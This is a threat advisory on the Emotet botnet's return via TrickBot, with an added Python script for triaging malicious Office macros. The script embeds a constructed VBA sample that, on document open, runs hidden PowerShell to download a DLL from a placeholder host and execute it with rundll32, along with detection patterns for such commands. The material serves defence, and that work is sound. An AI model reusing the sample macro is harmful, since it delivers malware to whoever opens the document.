Resurrection of Emotet Botnet Observed

Description

FortiGuard Labs is aware of reports that the Emotet botnet is making a comeback. Researchers at Cryptolaemus (@Cryptolaemus), GData and Advanced Intel have found that the botnet is back in business by way of the TrickBot botnet. Preliminary reports indicate that, over the weekend, the TrickBot threat actors were observed pushing a DLL file identified as Emotet to machines already infected with TrickBot.


Approximately ten months ago, law enforcement officials coordinated by Europol dismantled the Emotet botnet's command and control (C2) infrastructure. Additionally, in April 2021, law enforcement officials in the Netherlands pushed a module to infected computers that removed Emotet on a predetermined date, effectively bringing the botnet to a halt.


According to Luca Ebach, a researcher at GData, the threat actors behind TrickBot are distributing Emotet in what appears to be an attempt to get the botnet back into action. This relationship is not new: FortiGuard Labs covered it in 2020, when Emotet campaigns took advantage of the pandemic, and in 2019 in our Emotet Playbook.


What is Emotet in a Nutshell?

Emotet is classified as a Trojan downloader. First discovered in 2014 as a banking Trojan, it has since evolved into a modular Trojan downloader. Emotet is usually delivered via spearphishing emails, often with a specially crafted Microsoft Office document attached that contains malicious macros. Once enabled, these macros contact a command and control server to download the Emotet payload. Emotet has a symbiotic relationship with TrickBot and has in the past been observed dropping TrickBot, which in turn installed ransomware.
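The macro-to-C2 chain described above, as an added example that is not FortiGuard's code: a small static triage of VBA macro source that looks for the combination of an auto-execute entry point, a download primitive and an execution primitive, after undoing the Chr() and string-splitting tricks such macros use to hide those strings. It assumes the macro text has already been extracted from the document (for example with olevba from oletools); the VBA sample is constructed for illustration and is not a real Emotet macro.

```python
"""Static triage of VBA macro source for the Emotet-style pattern of an
auto-executing macro that downloads a payload and launches it.

Added example, not FortiGuard code. Input is macro source text already
extracted from the document; the VBA samples below are constructed.
"""
import re

# Entry points Office runs automatically when the document is opened or closed.
AUTO_EXEC = re.compile(
    r"\b(?:Sub|Function)\s+"
    r"(AutoOpen|Auto_Open|Document_Open|Workbook_Open|AutoExec|Document_Close|AutoClose)\b",
    re.I,
)
# Primitives commonly used to fetch a second stage.
DOWNLOAD = re.compile(
    r"(URLDownloadToFile|MSXML2\.XMLHTTP|WinHttp\.WinHttpRequest|InternetOpen"
    r"|DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest)",
    re.I,
)
# Primitives used to launch what was fetched (rundll32/regsvr32 for DLL payloads).
EXECUTE = re.compile(
    r"(\bShell\b|WScript\.Shell|Win32_Process|cmd(?:\.exe)?\b|powershell"
    r"|rundll32|regsvr32|mshta|\bwscript\b|\bcscript\b)",
    re.I,
)
URL = re.compile(r"https?://[^\s\"']+", re.I)
CHR_CALL = re.compile(r"Chr[BW]?\(\s*(\d+)\s*\)", re.I)
# Three or more Chr() calls joined with & or +: a cheap way to hide strings.
CHR_RUN = re.compile(
    r"Chr[BW]?\(\s*\d+\s*\)(?:\s*[&+]\s*Chr[BW]?\(\s*\d+\s*\)){2,}", re.I
)
STR_CONCAT = re.compile(r'"([^"]*)"\s*[&+]\s*"([^"]*)"')


def _decode_chr_run(run: str) -> str:
    """Turn Chr(104) & Chr(116) ... into the string it builds. Only printable
    ASCII other than the double quote is kept, so the result can be re-quoted
    as a VBA literal without escaping."""
    codes = [int(c) for c in CHR_CALL.findall(run)]
    return "".join(chr(c) for c in codes if 32 <= c < 127 and c != 34)


def normalise(vba: str) -> str:
    """Undo the obfuscation layers so the indicator regexes see real strings."""
    text = re.sub(r"\s_\r?\n\s*", " ", vba)  # join VBA line continuations
    text = CHR_RUN.sub(lambda m: '"' + _decode_chr_run(m.group(0)) + '"', text)
    prev = None
    while prev != text:  # "a" & "b" & "c" -> "abc", repeated until stable
        prev, text = text, STR_CONCAT.sub(
            lambda m: '"' + m.group(1) + m.group(2) + '"', text
        )
    return text


def triage_macro(vba: str) -> dict:
    """Return the indicators found and a verdict: high when the macro runs on
    open and both fetches and launches something, medium for one of the two."""
    text = normalise(vba)
    findings = {
        "auto_exec": sorted({m.group(1).lower() for m in AUTO_EXEC.finditer(text)}),
        "download": sorted({m.group(1).lower() for m in DOWNLOAD.finditer(text)}),
        "execute": sorted({m.group(1).lower() for m in EXECUTE.finditer(text)}),
        "urls": sorted(set(URL.findall(text))),
    }
    if findings["auto_exec"] and findings["download"] and findings["execute"]:
        findings["verdict"] = "high"
    elif findings["auto_exec"] and (findings["download"] or findings["execute"]):
        findings["verdict"] = "medium"
    else:
        findings["verdict"] = "low"
    return findings


# Constructed sample: strings built from pieces, then PowerShell fetches a DLL
# and runs it through rundll32. example.invalid is a reserved, non-routable name.
SAMPLE_VBA = r'''
Sub Document_Open()
    Dim o As Object
    Set o = CreateObject("WScr" & "ipt.Sh" & "ell")
    u = Chr(104) & Chr(116) & Chr(116) & Chr(112) & Chr(58) & Chr(47) & Chr(47) & "example.invalid/p.dll"
    o.Run "powershell -w hidden (New-Object Net.WebClient).DownloadFile('" & u & "','C:\Users\Public\p.dll'); rundll32 C:\Users\Public\p.dll,Control_RunDLL", 0
End Sub
'''

# Constructed benign macro for comparison.
BENIGN_VBA = '''
Sub FormatReport()
    ActiveDocument.Range.Font.Bold = True
End Sub
'''

if __name__ == "__main__":
    for name, src in (("sample", SAMPLE_VBA), ("benign", BENIGN_VBA)):
        print(name, triage_macro(src))
```

The verdict deliberately keys on the combination rather than any single string: a macro that only calls Shell, or only opens a URL, is common in legitimate documents, whereas one that does both from Document_Open matches the delivery chain this advisory describes. The normalisation is intentionally simple; it will not unpack macros that decode their strings at runtime, which is where sandbox detonation takes over.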


Emotet is capable of spoofing email threads from trusted senders and hijacking existing conversations so that its messages appear legitimate to unsuspecting recipients. This allows it to propagate further to other machines and networks and, at the same time, ensures its survival. Emotet has also been observed injecting DLL modules into various processes to intercept outbound network traffic and to harvest data from web browsers.


What Malware Family is Emotet Related To?

Emotet belongs to, and is loosely related to, a group of banking malware families comprising Bugat/Feodo/Geodo/Heodo/Cridex/Dridex, which have had their fair share of publicity over the past several years due to their widespread and destructive campaigns. Emotet has also been seen distributing AZORult, IcedID, ZeuS Panda and TrickBot. Because of this, Emotet gained the attention of the AV industry, law enforcement and researchers alike for its ability to distribute multiple malware families at once.


Who are Behind these Groups?

For a malware campaign to be successful over the long term, malware authors have to update their codebase and attack vectors on a regular basis to thwart detection and remediation. This is akin to a full-time job, and although we do not have any evidence of the inner workings of these groups, it is evident that these syndicates treat it like a highly successful business, with a team of dedicated developers and project leaders; the only difference is that it is an illegal criminal enterprise.


What is the Status of Coverage?

FortiGuard Labs provides the following AV coverage against this latest version of Emotet:


PossibleThreat.MU


All network IOCs are blocked by the WebFiltering client.


Any Other Suggested Mitigation?


As TrickBot actors have been observed redistributing Emotet via their own botnet, it is imperative to run up-to-date AV and IPS signatures.


It is also important to ensure that all known vendor vulnerabilities are patched, to prevent attackers from gaining a foothold within the network. Attackers are well aware of the difficulty of patching; if patching is determined not to be feasible at this time, a risk assessment should be conducted and compensating controls put in place until the patch can be applied.


Organizations are also encouraged to conduct ongoing training sessions to educate and inform personnel about the latest phishing and spearphishing attacks. Employees should be encouraged never to open attachments from someone they do not know, and to always treat emails from unrecognized or untrusted senders with caution. Since various phishing and spearphishing attacks have been reported to rely on social engineering for delivery, it is crucial that end users within an organization be made aware of the types of attacks in circulation. This can be accomplished through regular training sessions and impromptu tests using predetermined templates run by an organization's internal security department. Simple user awareness training on how to spot emails with malicious attachments or links can also help prevent initial access into the network.

Outbreak Alert

Emotet, a Trojan that is distributed via spam emails, has been prevalent since its first appearance in 2014. With a network made up of multiple botnets, Emotet has continuously sent out spam emails in campaigns designed to infect users via phishing attacks.
